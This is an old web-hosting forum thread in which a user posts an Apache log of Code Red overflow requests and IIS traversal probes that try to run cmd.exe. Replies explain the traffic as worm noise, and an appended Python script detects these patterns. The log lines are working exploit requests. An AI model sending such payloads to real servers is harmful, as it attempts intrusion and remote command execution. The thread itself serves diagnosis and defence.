How to stop this process?

Discussion in 'General Discussion' started by tekdns, Jun 15, 2003.

  1. tekdns

    tekdns Well-Known Member

    Joined:
    Jun 9, 2002
    Messages:
    100
    Likes Received:
    0
    Trophy Points:
    316
    Hi,


    How can I stop/block the processes below?

    "12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:04:33:49 -0400] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 302 280
    12.224.137.0 - - [15/Jun/2003:04:33:51 -0400] "GET /scripts/shell.exe?/c+dir+c: HTTP/1.1" 404 -
    127.0.0.1 - - [15/Jun/2003:04:35:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17184
    127.0.0.1 - - [15/Jun/2003:04:37:30 -0400] "GET / HTTP/1.0" 200 2673
    66.168.234.28 - - [15/Jun/2003:04:39:34 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:04:40:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17559
    218.70.224.215 - - [15/Jun/2003:04:40:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    217.219.246.4 - - [15/Jun/2003:04:44:22 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    66.190.164.146 - - [15/Jun/2003:04:44:56 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:57 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:58 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:44:59 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:00 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    127.0.0.1 - - [15/Jun/2003:04:45:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17966
    66.190.164.146 - - [15/Jun/2003:04:45:01 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:02 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:03 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:04 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    66.190.164.146 - - [15/Jun/2003:04:45:05 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:06 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.190.164.146 - - [15/Jun/2003:04:45:07 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.190.164.146 - - [15/Jun/2003:04:45:08 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.190.164.146 - - [15/Jun/2003:04:45:09 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    127.0.0.1 - - [15/Jun/2003:04:45:50 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:04:50:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18253
    66.82.121.147 - - [15/Jun/2003:04:51:49 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:04:54:11 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:04:55:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18059
    66.227.42.208 - - [15/Jun/2003:04:57:40 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    66.31.55.164 - - [15/Jun/2003:04:57:40 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:41 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:42 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:43 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:44 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 -
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:45 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 -
    66.31.55.164 - - [15/Jun/2003:04:57:46 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.31.55.164 - - [15/Jun/2003:04:57:47 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 265
    66.126.168.169 - - [15/Jun/2003:04:57:48 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    24.130.75.129 - - [15/Jun/2003:04:58:28 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 302 621
    127.0.0.1 - - [15/Jun/2003:05:00:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18040
    127.0.0.1 - - [15/Jun/2003:05:02:31 -0400] "GET / HTTP/1.0" 200 2673
    127.0.0.1 - - [15/Jun/2003:05:05:01 -0400] "GET /whm-server-status HTTP/1.0" 200 18264
    12.224.137.0 - - [15/Jun/2003:05:08:53 -0400] "GET /..%255c..%280
    12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 400 -
    12.224.137.0 - - [15/Jun/2003:05:08:59 -0400] "GET /msadc/

    ....................."

    Because after these processes, my server went down.

    Thanks for your help

    cPanel.net Support Ticket Number:
     
  2. promak

    promak Well-Known Member

    Joined:
    Oct 6, 2001
    Messages:
    248
    Likes Received:
    0
    Trophy Points:
    316
    This is Code Red.
    Try searching for Code Red in these forums.

    cPanel.net Support Ticket Number:
     
  3. tAzMaNiAc

    tAzMaNiAc Well-Known Member

    Joined:
    Feb 16, 2003
    Messages:
    559
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    Sachse, TX
    Those processes have nothing to do with why your server went down. Those are Windows machines looking to attack Windows machines with the IIS vulnerabilities.

    Unless you are running IIS and some strange configuration (cPanel DOES NOT run IIS :-D), this is not the problem.

    Brenden

    cPanel.net Support Ticket Number:
     
  4. Website Rob

    Website Rob Well-Known Member

    Joined:
    Mar 23, 2002
    Messages:
    1,505
    Likes Received:
    1
    Trophy Points:
    318
    Location:
    Alberta, Canada
    cPanel Access Level:
    Root Administrator
    It is possible that too many connection attempts were coming in too fast, creating a 'mini' DDOS attack. A brief look showed double-digit attempts per second.

    Do a search on this forum for 'sumthin' as there is some good information in one of the posts about what to do in these types of situations.

    cPanel.net Support Ticket Number:
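
Added example, not part of the original thread and not cPanel code: a small triage script for an Apache access log like the one in the first post. It labels the IIS-targeted requests (Code Red's `/default.ida?` and the `cmd.exe`/`root.exe` probes), reports the peak number of such requests in one second, and lists any that were answered with status 200. The sample lines are constructed, modeled on the posted log, with documentation-range addresses and a shortened `default.ida` query.

```python
import re
from collections import Counter

# Apache common log format: host ident user [time] "request" status bytes
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)$')

# Signatures for the IIS-targeted requests visible in the thread's log.
SIGNATURES = [
    ("code-red", re.compile(r"^GET /default\.ida\?", re.I)),
    ("iis-cmd-probe", re.compile(r"/(cmd|root|shell)\.exe\?", re.I)),
]

def classify(request):
    """Return the signature name for a request line, or None if it is benign."""
    for name, rx in SIGNATURES:
        if rx.search(request):
            return name
    return None

def summarize(lines):
    kinds, per_second, sources, served = Counter(), Counter(), Counter(), []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # blank or truncated entry, as at the end of the posted log
        host, ts, request, status, _size = m.groups()
        kind = classify(request)
        if kind is None:
            continue
        kinds[kind] += 1
        per_second[ts] += 1      # timestamps have one-second resolution
        sources[host] += 1
        if status == "200":      # a probe that was actually served needs a closer look
            served.append(line.strip())
    return {"kinds": dict(kinds), "sources": dict(sources),
            "peak_per_second": max(per_second.values(), default=0),
            "served_200": served}

# Constructed sample input (not the original log).
SAMPLE = """
192.0.2.10 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
192.0.2.10 - - [15/Jun/2003:04:33:48 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 302 280
192.0.2.10 - - [15/Jun/2003:04:33:50 -0400] "GET /scripts/root.exe?/c+dir+c: HTTP/1.1" 302 280
127.0.0.1 - - [15/Jun/2003:04:35:01 -0400] "GET /whm-server-status HTTP/1.0" 200 17184
198.51.100.7 - - [15/Jun/2003:04:39:34 -0400] "GET /default.ida?XXXXXXXX HTTP/1.0" 302 621
192.0.2.10 - - [15/Jun/2003:05:08:59 -0400] "GET /msadc/
"""

if __name__ == "__main__":
    print(summarize(SAMPLE.splitlines()))
```

An empty `served_200` list together with a low `peak_per_second` supports the reading that the probes are noise on an Apache host; a high peak is the case where request volume itself becomes the concern.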
     